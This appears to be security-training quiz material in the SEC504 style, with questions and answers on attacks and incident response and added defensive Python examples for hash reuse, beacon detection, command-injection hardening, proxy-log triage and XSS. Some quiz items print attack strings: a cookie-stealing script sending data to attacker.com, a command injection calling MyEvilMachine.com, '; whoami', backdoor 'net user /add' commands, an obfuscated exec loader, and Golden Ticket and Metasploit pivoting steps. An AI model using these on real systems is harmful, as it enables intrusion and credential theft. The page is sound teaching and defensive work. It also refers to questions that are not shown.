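Why identical hash values mean identical passwords here, and what a salted scheme changes, as an added example that is not part of the SEC504 material. The dump is the one from the question; the salted password entries and the iteration count are constructed for the demo. Note that the shared prefix between Peter's and Leann's hashes is coincidence: a cryptographic hash gives no hint that two inputs were similar, and only the digest length (not the algorithm, and not whether an HMAC key was involved) can be read off the dump.

```python
"""Added example: detecting shared passwords in an unsalted dump, and a salted replacement."""
import hashlib
import hmac
import os
from collections import defaultdict

DUMP = """alice:26ab0db90d72e28ad0ba1e22ee510510
barry:b026324c6904b2a9cb4b88d6d61c81d1
becky:6d7fce9fee471194aa8b5b6e47267f03
cindy:869c5758c412a4b16c682c2f983a804f
peter:869c5758c412a4b16c682c2f983a804f
leann:869c5758c412a4b16c682c6af517398f
sarah:26ab0db93c9c6e1b9b6252c8395efdc1
vivek:31d30eea8d0968d6458e0ad0027c9f80"""


def shared_hashes(dump):
    """Group users by hash value. With an unsalted hash, equal values mean equal
    passwords; with a per-user salt they would differ even for equal passwords."""
    users_by_hash = defaultdict(list)
    for line in dump.splitlines():
        user, _, digest = line.strip().partition(":")
        if digest:
            users_by_hash[digest.lower()].append(user)
    return {h: users for h, users in users_by_hash.items() if len(users) > 1}


def digest_family(hexdigest):
    """Only the output size is knowable from a dump: 128 bits fits MD5, MD4/NTLM
    and HMAC-MD5 alike. Nothing here proves HMAC was (or was not) used."""
    return {32: "128-bit (MD5 / NTLM / HMAC-MD5)", 40: "160-bit (SHA-1)",
            64: "256-bit (SHA-256)", 128: "512-bit (SHA-512)"}.get(len(hexdigest), "unknown")


# Salted, deliberately slow replacement. The count is kept low for the demo;
# use OWASP's current figure for PBKDF2-HMAC-SHA256 in production.
PBKDF2_ITERATIONS = 100_000


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)                       # fresh random salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    scheme, iterations, salt_hex, dk_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)        # constant-time comparison


if __name__ == "__main__":
    print(shared_hashes(DUMP))                          # cindy and peter share a hash
    print(digest_family("869c5758c412a4b16c682c2f983a804f"))
    first = hash_password("Winter2024!")
    second = hash_password("Winter2024!")               # constructed: same password, different salt
    print(first != second, verify_password("Winter2024!", first))
```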

Which of the following defenses protects against XSS but not SQL injection attacks? A) Content Security Policy B) Input validation C) Filtering dangerous characters D) Parametrized queries

A) Content Security Policy One defense against cross-site scripting (XSS) attacks is using the Content Security Policy (CSP) header on web servers to declare where linked resources can be loaded from in the requested page by the browser.

Which of the following techniques can help mitigate command injection attacks in the short term while application vulnerabilities are resolved? A) Deploying a WAF. B) Using parameterized queries. C) Implementing application allow-listing. D) Verifying all the code and fixing the web application.

A) Deploying a WAF.

During the remediation phase of incident response, you remove a file from your infected web server. What is the most important additional thing to do to prevent being compromised again? A) Determine the root cause of the attack. B) Review your host-based firewall rules. C) Restore the host data from backups. D) Apply patches and harden the system.

A) Determine the root cause of the attack.

How often is the SRUM database updated? A) Every hour and at system shutdown. B) Every five minutes and at system shutdown. C) Immediately after every monitored action is done. D) Every fifteen minutes and at system shutdown.

A) Every hour and at system shutdown.

A security consultant is making recommendations for a customer who is still using Windows Server 2003 in their environment. Which hashing mechanism listed below should the security consultant recommend be removed from the customer's environment? A) LANMAN B) NTLMv1 C) NT D) NTLMv2

A) LANMAN The LANMAN password-hashing mechanism is very weak and highly susceptible to password recovery attacks, even for complex passwords.

What type of endpoint bypass attack is this C# code for Windows? static void Main(string[] args) { Microsoft.Scripting.Hosting.ScriptEngine pythonEngine = IronPython.Hosting.Python.CreateEngine(); Microsoft.Scripting.Hosting.ScriptSource pythonScript = pythonEngine.CreateScriptSourceFromString("exec(__import__('base64') .b64decode(__import__('codecs').getencoder('utf-8')('cAByAGkAbgB0ACgAJw...KQA=')[0]))"); pythonScript.Execute(); A) Obfuscating malware to bypass threat detection capabilities. B) Disabling endpoint detection to allow malware. C) Leveraging permitted tools to run malware. D) Modifying malware to evade signature analysis.

A) Obfuscating malware to bypass threat detection capabilities. In a code wrapping and obfuscation endpoint evasion attack, the attacker takes malicious code, builds a new program around it using an intermediate wrapping library to execute their code (such as Python, Rust, Golang, or many other languages), and compiles it as a native Windows executable. This is an excerpt of a C# program that uses the IronPython library to execute obfuscated Python code natively in a C# program. An attacker can use a C# program to execute any Metasploit payload. After embedding the obfuscated Meterpreter payload in the C# source, the attacker can build a new executable using Microsoft Visual Studio.

Which of the following user accounts is targeted by an attacker to forge a Golden Ticket with the user password hash? A) Any domain admin account B) krbtgt C) Administrator D) SYSTEM

B) krbtgt Windows systems use Kerberos as a modern authentication mechanism, allowing untrusted devices in a network to verify the identity and authorization for users and services. In a Kerberos network, there is an attack known as the Golden Ticket attack. There are four steps to this attack that can grant an attacker unauthorized access and persistence to the network: 1. First, the attacker must compromise a domain controller. This could be through an exploit that grants domain administrator privilege but could also be achieved through a compromised backup. 2. Next, the attacker must retrieve the krbtgt user password hash. 3. Once the attacker has the krbtgt password hash, the hash can be used to forge arbitrary Ticket Granting Tickets (TGTs) using Mimikatz or Impacket. 4. With the ability to forge TGTs, an attacker can skip the Kerberos authentication process altogether, simply supplying the forged and trusted ticket to any service on the network, including remote access, database authentication, and local privilege escalation.

Which of the following commands can be used to create a user account on a Windows system through a non-interactive prompt? A) net account /add assetmgtacct Att@ckerPassw B) net user /add /usr assetmgtacct /password MyH@ckerPass43 C) net user /add assetmgtacct Att@ckerPassw D) net user /add assetmgtacct pwned

C) net user /add assetmgtacct Att@ckerPassw The only option with valid syntax that completes without prompting is "net user /add assetmgtacct Att@ckerPassw". "net user /add assetmgtacct pwned" fails on most Windows systems because "pwned" does not meet the local or domain password policy (minimum length and complexity). The 14-character ceiling also matters: when the password supplied to net user is longer than 14 characters, the command prints an interactive confirmation prompt about pre-Windows 2000 compatibility, which hangs a non-interactive session, so attackers keep the password at 14 characters or fewer. The other options have invalid syntax.

Which of the following tools can be utilized in a Linux system to search for the username associated with a specific SID? A) wmic useraccount list brief B) net view C) rpcclient D) enum

C) rpcclient The rpcclient tool is valuable for collecting information from a target SMB server. Originally created as a troubleshooting and debugging tool for the Samba suite, rpcclient is capable of interrogating the RPC services of a target Windows system. The rpcclient lookupsids command maps a security identifier (SID) to its username; lookupnames does the reverse, mapping a name to its SID.

Which command will display ASCII and Unicode strings within a malware sample? A) cat B) Get-Strings C) strings D) findstr

C) strings

A security analyst is tasked with auditing network login accounts for insecure passwords. The analyst plans on going through each account and interactively logging in to the account with a list of bad passwords. Why is this a bad idea? A) The script required to create the list of user accounts may be detected by EDR tools. B) It is not a bad idea; looping through a list of passwords is more efficient than trying the same password on each user account. C) A high number of login attempts could trigger an account lockout. D) Compared to other password-cracking methods, using wordlists takes the longest amount of time.

C) A high number of login attempts could trigger an account lockout.

In a packet capture, an analyst observes that a system sent a frequent, small, outbound communication to a known bad IP, over a seven-day period. What type of behavior is possibly occurring? A) Ack scan B) Fragmentation C) Beaconing D) Traceroute

C) Beaconing
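The inter-arrival regularity that this answer and the RITA answer earlier rely on, as an added example that is not RITA's code and not part of the SEC504 material: a small Zeek conn.log parser and a beacon test that groups connections by source, destination and port and flags pairs whose gaps have a low coefficient of variation (standard deviation divided by mean). The conn.log is constructed, with a 60-second beacon to 203.0.113.50 and irregular browsing to a second host; the thresholds are assumptions to tune.

```python
"""Added example: beacon detection from connection timing in a Zeek conn.log."""
import statistics
from collections import defaultdict

FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
          "proto", "service", "duration", "orig_bytes", "resp_bytes", "conn_state"]


def _row(ts, uid, orig, oport, resp, rport, obytes, rbytes):
    return "\t".join([f"{ts:.6f}", uid, orig, str(oport), resp, str(rport),
                      "tcp", "ssl", "0.5", str(obytes), str(rbytes), "SF"])


def _build_sample():
    base = 1709280000.0
    rows = []
    # Beacon: 10 connections roughly every 60 s with small jitter (constructed).
    for i, off in enumerate([0, 60.2, 119.7, 180.4, 240.1, 299.6, 360.3, 420.0, 479.8, 540.5]):
        rows.append(_row(base + off, f"CBeac{i}", "10.0.0.12", 49200 + i, "203.0.113.50", 443, 512, 1024))
    # Normal browsing: irregular gaps to a web server (constructed).
    for i, off in enumerate([5, 140, 150, 900, 901, 2400]):
        rows.append(_row(base + off, f"CWeb{i}", "10.0.0.7", 51000 + i, "93.184.216.34", 443, 8000, 90000))
    header = ["#separator \\x09", "#path\tconn", "#fields\t" + "\t".join(FIELDS)]
    return "\n".join(header + rows) + "\n"


SAMPLE_CONN_LOG = _build_sample()


def parse_zeek_tsv(text):
    """Yield one dict per record, using the #fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split("\t")))


def detect_beacons(text, min_conns=6, max_cv=0.2):
    """Return destinations whose connection gaps are too regular to be human."""
    times = defaultdict(list)
    for rec in parse_zeek_tsv(text):
        key = (rec["id.orig_h"], rec["id.resp_h"], rec["id.resp_p"])
        times[key].append(float(rec["ts"]))
    results = []
    for (orig, resp, port), ts in times.items():
        if len(ts) < min_conns:
            continue
        ts.sort()
        gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            results.append({"orig_h": orig, "resp_h": resp, "resp_p": port,
                            "count": len(ts), "mean_interval": round(mean, 2), "cv": round(cv, 4)})
    return sorted(results, key=lambda r: r["cv"])


if __name__ == "__main__":
    for hit in detect_beacons(SAMPLE_CONN_LOG):
        print(hit)
```

Real implants add jitter deliberately, so pair the timing test with the other signal in the question (small, constant-sized payloads: compare the spread of orig_bytes per pair) and lengthen the window to days, as the seven-day capture in the question suggests.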

Using the following URL, what is the application vulnerable to if userData.pl responds with the output of nslookup? http://AFineWebApp/cgi-bin/userData.pl?doc=user1.txt;nslookup MyEvilMachine.com A) Cross-site scripting B) Session manipulation C) Command injection D) SQL injection

C) Command injection
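The userData.pl pattern in this question (and the "; whoami" separator asked about at the end of the page) rebuilt in Python as an added example that is not part of the SEC504 material. echo stands in for nslookup so it runs safely offline and the output is checkable. The vulnerable form hands the doc parameter to a shell; the hardened forms either quote it or never involve a shell at all.

```python
"""Added example: command injection via string concatenation, with two hardened forms."""
import re
import shlex
import subprocess

# Allow list for a document name: no shell metacharacters, no path tricks.
DOC_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def is_valid_doc(name):
    return bool(DOC_NAME.fullmatch(name)) and ".." not in name


def lookup_vulnerable(doc):
    """String concatenation into a shell: ';', '|', '&&' and '$( )' all work here."""
    return subprocess.run(f"echo {doc}", shell=True, capture_output=True, text=True).stdout


def lookup_quoted(doc):
    """Still a shell, but shlex.quote turns the input into one quoted word."""
    return subprocess.run(f"echo {shlex.quote(doc)}", shell=True, capture_output=True, text=True).stdout


def lookup_hardened(doc):
    """Validate, then pass argv directly: no shell ever parses the value."""
    if not is_valid_doc(doc):
        raise ValueError(f"rejected document name: {doc!r}")
    return subprocess.run(["echo", doc], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    payload = "user1.txt;echo INJECTED"      # same shape as user1.txt;nslookup MyEvilMachine.com
    print(repr(lookup_vulnerable(payload)))   # two commands ran
    print(repr(lookup_quoted(payload)))       # one literal argument
    try:
        lookup_hardened(payload)
    except ValueError as err:
        print(err)
```

Prefer the argv form with validation over quoting alone: shlex.quote stops the separator trick, but the value still reaches the program as an argument, so a name beginning with "-" can still be read as an option by the command being wrapped.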

Which of the following is a challenge presented to an attacker when scanning cloud targets as opposed to non-cloud targets? A) Potential to bypass ACL filters B) May reveal information about non-cloud assets C) Difficult to identify the owner of a given target D) Less likely to be monitored and logged

C) Difficult to identify the owner of a given target

Which of the following is a defense against hijacking attacks? A) Disabling LM hashes B) Disabling SMB C) Disabling LLMNR D) Disabling Wdigest

C) Disabling LLMNR To defend against Responder and LLMNR attackers, it is important to disable LLMNR support on servers and workstations. LLMNR was once valuable as a mechanism for small workgroups to refer to other entities by name without a centralized DNS server, but it is rarely needed in modern organizations.

What type of log could be used to identify cloud storage use in your organization? A) Reverse proxy log B) DHCP log C) HTTP proxy log D) Application log

C) HTTP proxy log
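A parser for the Squid native access.log format shown in the proxy question earlier on this page, used here to pick out cloud storage traffic as this answer describes. This is an added example, not part of the SEC504 material; the first log line is the one from that question and the remaining lines are constructed, with the bucket, account and peer addresses made up.

```python
"""Added example: Squid access.log parsing and cloud storage triage."""
import re
from urllib.parse import urlsplit

PAGE_LINE = ("1583050850.951 185 192.168.40.123 TCP_MISS/200 1856 POST "
             "https://update.googleapis.com/service/update2? -ORIGINAL_DST/172.219.10.153 text/xml")

# Constructed lines in the standard ten-field native format.
SAMPLE_LOG = "\n".join([
    PAGE_LINE,
    "1583050900.111 230 192.168.40.123 TCP_MISS/200 412 PUT https://acme-backups.s3.amazonaws.com/dump.zip - HIER_DIRECT/52.216.8.1 application/xml",
    "1583050950.222 310 192.168.40.200 TCP_MISS/201 0 PUT https://acme.blob.core.windows.net/drop/a.7z?sv=2020 - HIER_DIRECT/20.60.1.1 -",
    "1583051000.333 15 192.168.40.123 TCP_HIT/200 1200 GET https://www.example.com/ - HIER_NONE/- text/html",
    "1583051100.444 60123 192.168.40.77 TCP_TUNNEL/200 3981223 CONNECT storage.googleapis.com:443 - HIER_DIRECT/142.250.1.1 -",
])

S3_HOST = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$")


def cloud_storage_provider(host):
    if host is None:
        return None
    host = host.lower()
    if S3_HOST.search(host):
        return "AWS S3"
    if host.endswith(".blob.core.windows.net"):
        return "Azure Blob"
    if host == "storage.googleapis.com" or host.endswith(".storage.googleapis.com"):
        return "Google Cloud Storage"
    return None


def parse_squid_line(line):
    """Squid native format: time elapsed client code/status bytes method URL ident hier/peer type.
    Some exports fuse the '-' ident with the hierarchy field, as in the page's line."""
    t = line.split()
    if len(t) == 9 and t[7].startswith("-") and "/" in t[7]:
        t = t[:7] + ["-", t[7][1:]] + t[8:]
    if len(t) != 10:
        raise ValueError(f"unexpected field count {len(t)}")
    ts, elapsed, client, code_status, nbytes, method, url, ident, hier, ctype = t
    code, status = code_status.split("/", 1)
    # CONNECT lines carry host:port, not a URL, and hide everything inside the tunnel.
    host = url.rsplit(":", 1)[0] if method == "CONNECT" else urlsplit(url).hostname
    return {"ts": float(ts), "client": client, "result": code, "status": int(status),
            "reply_bytes": int(nbytes), "method": method, "url": url, "host": host,
            "hier": hier, "content_type": ctype}


def find_cloud_storage_use(log_text):
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_squid_line(line)
        provider = cloud_storage_provider(rec["host"])
        if not provider:
            continue
        if rec["method"] in ("PUT", "POST"):
            direction = "upload"
        elif rec["method"] == "CONNECT":
            direction = "tunnel (direction unknown)"
        else:
            direction = "download or listing"
        hits.append({"client": rec["client"], "host": rec["host"], "provider": provider,
                     "method": rec["method"], "direction": direction})
    return hits


if __name__ == "__main__":
    for hit in find_cloud_storage_use(SAMPLE_LOG):
        print(hit)
```

Two caveats for sizing an exfiltration: the bytes field in the native format is the reply size sent to the client, not the request body, so upload volume needs a custom logformat that records request size; and without TLS interception most HTTPS traffic appears only as CONNECT to a hostname, which tells you the destination but not the method or path.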

Which of the following XSS attacks requires some social engineering effort in conjunction with exploitation of web server-side input processing weaknesses to complete? A) Stored cross-site scripting attack. B) Embedded cross-site scripting attack. C) Reflected cross-site scripting attack. D) DOM-based cross-site scripting attack.

C) Reflected cross-site scripting attack. In a reflected XSS attack, the attacker identifies a server input validation vulnerability in one of the parameters of an HTTP GET request that is subsequently displayed (or reflected) in the output returned to the requesting client. Unlike the stored XSS attack, the reflected XSS attack requires some social engineering, such as sending the victim a specially crafted link. If the victim clicks on this link, the attack will complete by running the malicious code included in the attacker link.
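The reflected pattern in this answer and the Content Security Policy defense from the earlier XSS question, as an added example that is not part of the SEC504 material: the vulnerable rendering beside its output-encoded form, plus a small check of whether a given CSP would still let a reflected inline script execute. The search page and the policies are constructed.

```python
"""Added example: reflected XSS, output encoding, and a CSP inline-script check."""
import html

CSP_STRICT = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def render_search_vulnerable(query):
    """Reflects the GET parameter into the page unencoded."""
    return f"<h1>Results for {query}</h1>"


def render_search_escaped(query):
    """Output encoding turns <, >, &, and quotes into entities; the browser shows text."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def parse_csp(policy):
    """'a b; c d e' -> {'a': ['b'], 'c': ['d', 'e']}"""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def csp_allows_inline_script(policy):
    """True if an injected inline <script> would execute under this policy.
    script-src governs, default-src is the fallback, and no directive means no limit.
    A nonce or hash source makes 'unsafe-inline' ignored (CSP Level 2 and later)."""
    directives = parse_csp(policy)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                            for s in sources)
    return "'unsafe-inline'" in sources and not has_nonce_or_hash


def search_response(query, policy=CSP_STRICT):
    """Both defenses together: encoded output plus a restrictive CSP header."""
    return {"status": 200,
            "headers": {"Content-Type": "text/html; charset=utf-8",
                        "Content-Security-Policy": policy},
            "body": render_search_escaped(query)}


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"
    print(render_search_vulnerable(payload))
    print(render_search_escaped(payload))
    print(csp_allows_inline_script("img-src 'self'"), csp_allows_inline_script(CSP_STRICT))
```

CSP is the backstop, not the fix: the escaped rendering stops the injection, while the policy limits the damage when some other template forgets to encode. The check also shows why a policy that only sets img-src or style-src does nothing for script injection.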

Which of the following defenses can help characterize data transfer totals and apps used after an attacker has exfiltrated data from a Windows victim host? A) Restrictive filesystem permissions B) Egress firewall rules C) SRUM D) Application whitelisting

C) SRUM Following a compromise, incident responders can use SRUM data to characterize data transfer tools by app name, which can be valuable for characterizing the amount and possible sources of data extracted from a compromised system.

Which of the commands below would assist with reviewing logging information from Amazon Web Services? A) basicblobfinder.py -get-all-blobs B) aws ec2 describe-volumes | jq -r '.Volumes[] | select ( .AvailabilityZone | contains("us-east-1") ) | .VolumeId' C) aws s3 describe-logs | parse D) s3logparse.py useragent sec504-erk20*

D) s3logparse.py useragent sec504-erk20* Several tools are available to assist with manual review of logging information. Windows event logs can be queried using PowerShell cmdlets such as Get-EventLog and Get-WinEvent, or with the command-line tool wevtutil. Purpose-built tools for reviewing logging information are available for almost all cloud log file formats, including s3logparse.

What is a bucket squatting attack? A) Scanning for buckets with public access. B) Exfiltrating data using cloud storage buckets. C) Uploading and using web shells against buckets with public writable permissions. D) Registering a bucket that uses an organization name.

D) Registering a bucket that uses an organization name.

Which of the following common web attack techniques targets the supporting database of an application? A) XSS B) Path traversal C) Command injection D) SQL injection

D) SQL injection

As attackers adapt new C2 and exfil techniques, traditional IDS becomes less effective at identifying threats. Which of the following techniques can be used to detect C2 that is commonly missed by traditional IDS techniques? A) Predictive analysis B) Signature-based detection C) Payload content analysis D) Statistical anomaly analysis

D) Statistical anomaly analysis

Which Sysinternals tool can be used to collect detailed log event information for security information and event monitoring and analysis? A) Process Monitor B) Autoruns C) Procdump D) Sysmon

D) Sysmon Sysmon is a service and driver that can be configured to collect detailed event information. This is valuable when combined with an event monitoring tool such as a SIEM or Windows Event Collection.

Which Metasploit module category makes the target do something the attacker wants? A) The exploit. B) The post module. C) The auxiliary module. D) The payload.

D) The payload.

Which characteristic distinguishes watering hole attacks from drive-by attacks? A) Watering hole attacks target vulnerabilities in email clients. B) Watering hole attacks are focused only against an individual. C) Watering hole attacks target individuals mainly through email. D) Watering hole attacks target a specific victim group.

D) Watering hole attacks target a specific victim group.

Which of the following Metasploit modules can be used for pivoting (lateral movement) through a compromised host? A) auxiliary/server/portfwd B) post_exploitation/server/socks5 C) lateral_movement/socks4a D) auxiliary/server/socks4a

D) auxiliary/server/socks4a Attackers can reuse their command and control (C2) access by pivoting and gaining access to new hosts in the network. A powerful example of this is the Meterpreter C2 framework, deployed either as a part of the initial exploit or through an independent payload generated using MsfVenom. An attacker can start a proxy server on their system with auxiliary/server/socks4a and relay traffic through the pivot (compromised host) by reusing the Meterpreter session with a new route to the internal target.

Which of the following Metasploit modules allows an attacker to create a persistent service on a Windows target? A) exploit/persistence/windows/persistent_service B) exploit/post-compromise/local/service C) exploit/windows/persistence/service D) exploit/windows/local/persistence_service

D) exploit/windows/local/persistence_service

Which of the following is an example of a command injection attack on a Linux application? A) foo.jpg # whoami B) foo.jpg 'or '1'='1 C) foo.jpg -- whoami D) foo.jpg; whoami

D) foo.jpg; whoami

Which file should not be left behind after a password audit conducted with John the Ripper? A) passwd B) results.txt C) password.txt D) john.pot

D) john.pot The john.pot file includes all the passwords that John the Ripper is able to recover from a file containing password hashes. Security auditors must remember to remove this file when finished with a password audit that uses John the Ripper.

In the following pstree output, which process spawned cmd.exe (which is not normal behavior)?

0x8b1b4680:dllhost.exe 356 520 2020-01-18 04:19:55 UTC+0000
.0x89a412c0:csrss.exe 368 356 2020-01-18 04:19:48 UTC+0000
..0x802f61c0:services.exe 520 448 2020-01-18 04:19:48 UTC+0000
...0x8ac77040:svchost.exe 628 520 2020-01-18 04:19:49 UTC+0000
..0x802fc500:lsass.exe 528 448 2020-01-18 04:19:48 UTC+0000
...0x89766cc0:cmd.exe 920 528 2020-01-18 04:29:17 UTC+0000
....0x896a8600:find.exe 1208 920 2020-01-18 04:31:27 UTC+0000

A) services.exe B) csrss.exe C) find.exe D) lsass.exe

D) lsass.exe

Which of the following built-in commands allows port forwarding on Windows? A) wmic B) plink C) route D) netsh

D) netsh On Windows systems, the netsh command has a built-in feature to start listening on an arbitrary port number and forwarding any activity to a remote IP address and TCP port. Unlike Meterpreter portfwd or SSH tunneling, the listening port in this example is on the victim system itself, not the attacker system. An attacker can still use this for pivoting and to obscure the source of the attack on the network, but it requires that they can connect to the victim system on the listening port.

How many days of historical data are saved in the System Resource Usage Monitor database? A) 45 B) 90 C) 15 D) 30

D) 30

While reviewing logs from a web server, a web administrator notices that every page on a company's site was accessed within a span of six minutes. What is this indicative of? A) A web hoster B) A web walker C) A web skipper D) A web crawler

D) A web crawler

What method could be used to ensure that an asset under investigation is not put back into production without approval before the investigation is complete? A) Move the asset to a different cloud data center. B) Terminate the asset. C) Shut off all administrative access to the cloud environment so no admins can make changes. D) Add an "under investigation" tag to the asset.

D) Add an "under investigation" tag to the asset.

Which of the following is the best mitigation against password-cracking attacks that target Windows systems? A) Deploying Exploit Guard and virtualization isolation. B) Requiring long passphrases rather than complex passwords. C) Requiring NTLMv2 password hashes. D) Deploying multi-factor authentication.

D) Deploying multi-factor authentication.

Which of the following attacks can be used to deliver an exploit to a user browsing the Internet through a seemingly innocuous website? A) Server-side B) SQL injection C) XSS D) Drive-by

D) Drive-by

What is the first step attackers take when engaging in a password-cracking attack against an organization? A) Access high-value targets. B) Crack password hashes for as long as necessary. C) Dump available password hashes. D) Exploit a low-value target.

D) Exploit a low-value target. Attackers will commonly seek to exploit a system of low-to-medium importance as the first step in cracking passwords. A system of lower importance is less likely to be hardened against attacks, less likely to be closely monitored, and may even be relatively neglected. This makes it an ideal target to exploit and gain a foothold: the attacker dumps all available password hashes, cracks those hashes, and reuses the recovered passwords to access high-importance targets.

An attacker uses the following URL. What are they attempting to do? http://counterhack.net/search.php?word=<script>document.location='http://attacker.com/save.php?c='+document.cookie</script> A) Manipulate the search results returned from the victim's browser. B) Search the target site for functionality that does not filter user-supplied input. C) Redirect a victim to the attacker's clone of a web page. D) Get a cookie that a victim has stored in their browser.

D) Get a cookie that a victim has stored in their browser.

What header field in IPv6 is similar to the TTL field in an IPv4 header? A) Flow Label B) Class C) TTL D) Hop Limit

D) Hop Limit

Which of the following is a characteristic of UDP? A) Its sequence numbers are preserved. B) It is connection oriented. C) It uses acknowledgments. D) It is connection-less.

D) It is connection-less.

What tool is designed to work with and parse JSON data? A) jayson B) jquery C) jsonparse D) JQ

D) JQ JQ is a lightweight tool and programming language written by Stephen Dolan for parsing, interrogating, and editing JSON data. Although it is technically a programming language, JQ can be easy to get started with, making it simple to take complex JSON data and format it for easy reading. JQ can also be quite complex, using a variety of built-in and custom functions to process JSON data.

Which of the following protocols can be abused by Responder in a hijacking attack to impersonate servers and harvest credentials? A) ARP B) DHCP C) Kerberos D) LLMNR

D) LLMNR In a hijacking attack, an adversary responds to system requests for services (such as name resolution requests) and pretends to be the legitimate system. While this sometimes involves the use of machine-in-the-middle (MitM) attacks, it can also operate by observing broadcast requests for services on the LAN and injecting responses that will be processed by client systems. For an adversary, one powerful opportunity is to respond to broadcast requests for weak name resolution protocols such as the Link-Local Multicast Name Resolution (LLMNR) protocol, pretend to be a server by launching several services, and trick the victim into sending authentication credentials to the attacker.

Which TCP flag indicates that a connection should be torn down abruptly? A) ACK B) FIN C) URG D) RST

D) RST

Which Nmap command will disable port scanning and focus solely on host discovery?

sudo nmap -sC 192.168.1.1-254
sudo nmap -Pn 192.168.1.1-254
sudo nmap -sn 192.168.1.1-254
sudo nmap -sS -sV 192.168.1.1-254

sudo nmap -sn 192.168.1.1-254
